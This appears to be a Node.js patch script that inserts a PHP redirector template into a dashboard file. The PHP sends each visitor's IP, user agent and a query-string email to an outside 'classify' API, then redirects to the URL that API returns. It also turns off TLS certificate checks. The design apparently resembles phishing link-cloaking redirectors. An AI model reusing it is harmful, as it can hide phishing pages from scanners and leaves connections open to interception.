const fs = require('fs');
let code = fs.readFileSync('client/src/pages/user-dashboard.tsx', 'utf8');

const regex = /const phpContent = \`<\?php[\s\S]*?\?>\`;/;

const newPhpContent = "const phpContent = `<?php\\nsession_start();\\n$apiKey = '${apiKey}';\\n$apiEndpoint = '${apiEndpoint}';\\n\\n$visitorIp = $_SERVER['HTTP_CF_CONNECTING_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1';\\nif (strpos($visitorIp, ',') !== false) {\\n    $visitorIp = trim(explode(',', $visitorIp)[0]);\\n}\\n$visitorUserAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';\\n$email = null;\\nif (!empty($_SERVER['QUERY_STRING'])) {\\n    parse_str($_SERVER['QUERY_STRING'], $queryParams);\\n    $email = $queryParams['e'] ?? $queryParams['email'] ?? null;\\n}\\n\\n$requestData = [\\n    'ip' => $visitorIp,\\n    'userAgent' => $visitorUserAgent,\\n    'apiKey' => $apiKey\\n];\\nif ($email) $requestData['email'] = $email;\\n\\n$ch = curl_init();\\ncurl_setopt_array($ch, [\\n    CURLOPT_URL => $apiEndpoint . '/api/classify',\\n    CURLOPT_RETURNTRANSFER => true,\\n    CURLOPT_POST => true,\\n    CURLOPT_POSTFIELDS => json_encode($requestData),\\n    CURLOPT_HTTPHEADER => [\\n        'Content-Type: application/json',\\n        'Authorization: Bearer ' . $apiKey,\\n    ],\\n    CURLOPT_TIMEOUT => 8,\\n    CURLOPT_CONNECTTIMEOUT => 5,\\n    CURLOPT_SSL_VERIFYPEER => false,\\n    CURLOPT_SSL_VERIFYHOST => 0,\\n    CURLOPT_FOLLOWLOCATION => true\\n]);\\n$response = curl_exec($ch);\\n$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n$curlError = curl_error($ch);\\ncurl_close($ch);\\n\\nif ($httpCode === 200 && $response) {\\n    $data = json_decode($response, true);\\n    if (!empty($data['redirectUrl'])) {\\n        $redirectUrl = rtrim($data['redirectUrl'], '#');\\n        if (!empty($_SERVER['QUERY_STRING'])) {\\n            $separator = (strpos($redirectUrl, '?') !== false) ? '&' : '?';\\n            $redirectUrl .= $separator . $_SERVER['QUERY_STRING'];\\n        }\\n        header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');\\n        header('Location: ' . $redirectUrl);\\n        exit;\\n    }\\n}\\n\\n// Log error to Admin Dashboard\\n$errorMsg = $curlError ?: \\\"HTTP Code: $httpCode | Response: \\\" . substr((string)$response, 0, 150);\\n$ch2 = curl_init();\\ncurl_setopt_array($ch2, [\\n    CURLOPT_URL => $apiEndpoint . '/api/client-error',\\n    CURLOPT_RETURNTRANSFER => true,\\n    CURLOPT_POST => true,\\n    CURLOPT_POSTFIELDS => json_encode(['apiKey' => $apiKey, 'ip' => $visitorIp, 'error' => $errorMsg]),\\n    CURLOPT_HTTPHEADER => ['Content-Type: application/json'],\\n    CURLOPT_TIMEOUT => 3,\\n    CURLOPT_SSL_VERIFYPEER => false,\\n    CURLOPT_SSL_VERIFYHOST => 0\\n]);\\ncurl_exec($ch2);\\ncurl_close($ch2);\\n\\n// Display error if completely failed\\nhttp_response_code(503);\\necho \\\"Classification Service Unavailable. Error logged.\\\";\\nexit;\\n?>`;";

code = code.replace(regex, newPhpContent);

fs.writeFileSync('client/src/pages/user-dashboard.tsx', code);
console.log('done');
